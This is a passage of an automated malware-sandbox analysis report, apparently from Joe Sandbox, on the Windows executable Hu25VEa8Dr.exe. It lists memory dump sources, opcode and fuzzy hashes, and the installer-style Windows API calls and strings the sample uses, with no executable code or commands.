            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
            • Instruction ID: 671146196c1174ec618cbc22bbed2adbdbe1d7b4d249fb8fe9215707769dedfe
            • Opcode Fuzzy Hash: c2605cf98d0f5e4d904242d25cd3a4b56aad5cd8bbaf3b06cd26a7c18d89d64d
            • Instruction Fuzzy Hash: 3FE16971901B09DFDB24CF58C880BAABBF5EB44305F15852EE897A72D1D378AA51CF44
            Uniqueness

            Uniqueness Score: -1.00%

            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
            • Instruction ID: ce73a9d55fc041a401e528a6b0bed7c2fc314d3430b7e91baefc2d4226deaab1
            • Opcode Fuzzy Hash: b751e5aff08849ce342a749075ab7f0bf0a9efd73ac853bc595c300a3c4f69bb
            • Instruction Fuzzy Hash: 51C13A71A002698BDF14CF68C4905EEB7B2FF99314F26827AD856B7380D7346952CF94
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403927
            • ShowWindow.USER32(?), ref: 00403944
            • DestroyWindow.USER32 ref: 00403958
            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403974
            • GetDlgItem.USER32(?,?), ref: 00403995
            • SendMessageA.USER32 ref: 004039A9
            • IsWindowEnabled.USER32(00000000), ref: 004039B0
            • GetDlgItem.USER32(?,00000001), ref: 00403A5E
            • GetDlgItem.USER32(?,00000002), ref: 00403A68
            • SetClassLongA.USER32(?,000000F2,?), ref: 00403A82
            • SendMessageA.USER32 ref: 00403AD3
            • GetDlgItem.USER32(?,00000003), ref: 00403B79
            • ShowWindow.USER32(00000000,?), ref: 00403B9A
            • EnableWindow.USER32(?,?), ref: 00403BAC
            • EnableWindow.USER32(?,?), ref: 00403BC7
            • GetSystemMenu.USER32 ref: 00403BDD
            • EnableMenuItem.USER32 ref: 00403BE4
            • SendMessageA.USER32 ref: 00403BFC
            • SendMessageA.USER32 ref: 00403C0F
            • lstrlenA.KERNEL32(00429FE0,?,00429FE0,0042E360), ref: 00403C38
            • SetWindowTextA.USER32(?,00429FE0), ref: 00403C47
            • ShowWindow.USER32(?,0000000A), ref: 00403D7B
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
            • String ID:
            • API String ID: 184305955-0
            • Opcode ID: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
            • Instruction ID: 552f9e5d3371f53337095c5be2d86efa37a563823f2766eb5c4291c6ef6876bd
            • Opcode Fuzzy Hash: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
            • Instruction Fuzzy Hash: B8C1B171604204AFD721AF62ED85E2B7F6CEB44706F40053EF941B51E1C779A942DB2E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • lstrcatA.KERNEL32(1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035C6
            • lstrlenA.KERNEL32(hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\Hu25VEa8Dr.exe"), ref: 0040363B
            • lstrcmpiA.KERNEL32(?,.exe,hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000), ref: 0040364E
            • GetFileAttributesA.KERNEL32(hjgjhad), ref: 00403659
            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 004036A2
              • Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977
            • RegisterClassA.USER32 ref: 004036E9
            • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403701
            • CreateWindowExA.USER32 ref: 0040373A
            • ShowWindow.USER32(00000005,00000000), ref: 00403770
            • LoadLibraryA.KERNEL32(RichEd20), ref: 00403781
            • LoadLibraryA.KERNEL32(RichEd32), ref: 0040378C
            • GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 0040379C
            • GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004037A9
            • RegisterClassA.USER32(0042E300), ref: 004037B2
            • DialogBoxParamA.USER32 ref: 004037D1
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hjgjhad
            • API String ID: 914957316-3666124790
            • Opcode ID: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
            • Instruction ID: af9374935d7a54fd1dce6881c110e57d7cc589bc1fe1380e1b33b637fa7f222c
            • Opcode Fuzzy Hash: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
            • Instruction Fuzzy Hash: E161C571604204BAD220AF669D85F273EACE744759F40447FF941B22E1D779AD028B3E
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F91
            • GetDlgItem.USER32(00000000,000003E8), ref: 00403FA5
            • SendMessageA.USER32 ref: 00403FC3
            • GetSysColor.USER32 ref: 00403FD4
            • SendMessageA.USER32 ref: 00403FE3
            • SendMessageA.USER32 ref: 00403FF2
            • lstrlenA.KERNEL32(?), ref: 00403FFC
            • SendMessageA.USER32 ref: 0040400A
            • SendMessageA.USER32 ref: 00404019
            • GetDlgItem.USER32(?,0000040A), ref: 0040407C
            • SendMessageA.USER32 ref: 0040407F
            • GetDlgItem.USER32(?,000003E8), ref: 004040AA
            • SendMessageA.USER32 ref: 004040EA
            • LoadCursorA.USER32 ref: 004040F9
            • SetCursor.USER32(00000000), ref: 00404102
            • ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404115
            • LoadCursorA.USER32 ref: 00404122
            • SetCursor.USER32(00000000), ref: 00404125
            • SendMessageA.USER32 ref: 00404151
            • SendMessageA.USER32 ref: 00404165
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
            • String ID: N$hjgjhad$open
            • API String ID: 3615053054-1121083075
            • Opcode ID: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
            • Instruction ID: 0605a8af88f24b8a239437e517aaa265f180be2417519ff34b25117700073a86
            • Opcode Fuzzy Hash: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
            • Instruction Fuzzy Hash: D161C1B1A40209BBEB109F60DD45F6A3B69FF54715F108036FB01BA2D1C7B8A991CF98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectA.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextA.USER32(00000000,0042E360,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
            • Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
            • Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
            • Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
              • Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
              • Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C
            • CloseHandle.KERNEL32(00000000), ref: 004057A7
            • GetShortPathNameA.KERNEL32 ref: 004057B0
            • GetShortPathNameA.KERNEL32 ref: 004057CD
            • wsprintfA.USER32 ref: 004057EB
            • GetFileSize.KERNEL32(00000000,00000000,0042BBE8,C0000000,00000004,0042BBE8,?,?,?,00000000,000000F1,?), ref: 00405826
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405835
            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040584B
            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405891
            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004058A3
            • GlobalFree.KERNEL32(00000000), ref: 004058AA
            • CloseHandle.KERNEL32(00000000), ref: 004058B1
              • Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
              • Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
            • String ID: %s=%s$[Rename]
            • API String ID: 3772915668-1727408572
            • Opcode ID: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
            • Instruction ID: 426fb2abaf3c2c6495405564ff4e517f65c757b77f6bed08917e1be6c8ffeb7f
            • Opcode Fuzzy Hash: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
            • Instruction Fuzzy Hash: 6341FF32606B15ABE3206B619C49F6B3A5CDF80705F004436FD05F62C2E678E8118EBD
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Char$Next$Prev
            • String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
            • API String ID: 589700163-906959726
            • Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
            • Instruction ID: 3b67653c5ee308ebbdbeafcda2e7905df7fa5ba98b11233f7c0ae47683edab57
            • Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
            • Instruction Fuzzy Hash: 0811905180CB912EFB3206245D44BB7BF89CB567A0F58447BE9C5B22C2CA7C5C429A6D
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
            • String ID:
            • API String ID: 2320649405-0
            • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
            • Instruction ID: df06335cf3b4afc37a3544ae2d30c5d34a8579c70edf0d6bae8496df32602c64
            • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
            • Instruction Fuzzy Hash: DC219671904709ABCB219F78DD08B4B7FF8AF00715F048A29F855E22E0D338E904CB95
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
            • GlobalFree.KERNEL32(?), ref: 00402725
            • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402737
            • GlobalFree.KERNEL32(00000000), ref: 0040273E
            • CloseHandle.KERNEL32(FFFFFD66), ref: 00402756
            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
            • String ID:
            • API String ID: 3294113728-0
            • Opcode ID: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
            • Instruction ID: 62f2159171fbc9033078dd1539b67ba065abfcd1800d5973976be9d0b9eda31e
            • Opcode Fuzzy Hash: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
            • Instruction Fuzzy Hash: DE319F71C00128BBDF216FA5CD89EAE7E78EF04364F10422AF524772E0C7795D419BA9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
            • lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
            • lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
            • SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
            • SendMessageA.USER32 ref: 00404E3E
            • SendMessageA.USER32 ref: 00404E58
            • SendMessageA.USER32 ref: 00404E66
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: MessageSend$lstrlen$TextWindowlstrcat
            • String ID:
            • API String ID: 2531174081-0
            • Opcode ID: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
            • Instruction ID: 64f14355eea1465708e63b557f2fc924fecf56a011f776fb8de10cf69f9f2b8c
            • Opcode Fuzzy Hash: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
            • Instruction Fuzzy Hash: F7216071A00118BBDB119FA9DD85ADEBFA9FF44354F14807AF904B6290C7398E418F98
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Message$Send$ClientScreen
            • String ID: f
            • API String ID: 41195575-1993550816
            • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
            • Instruction ID: b5388fb2048f9adb4f66bcd81e9da03b2d8faafec29f08353259a6dacb87349b
            • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
            • Instruction Fuzzy Hash: 0E014071D00219BADB00DB94DC45BEEBBB8AB59711F10016ABA11B61C0D7B865418BA5
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
            • MulDiv.KERNEL32 ref: 00402B81
            • wsprintfA.USER32 ref: 00402B91
            • SetWindowTextA.USER32(?,?), ref: 00402BA1
            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
            Strings
            • verifying installer: %d%%, xrefs: 00402B8B
            Memory Dump Source
            • Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd
            Similarity
            • API ID: Text$ItemTimerWindowwsprintf
            • String ID: verifying installer: %d%%
            • API String ID: 1451636040-82062127
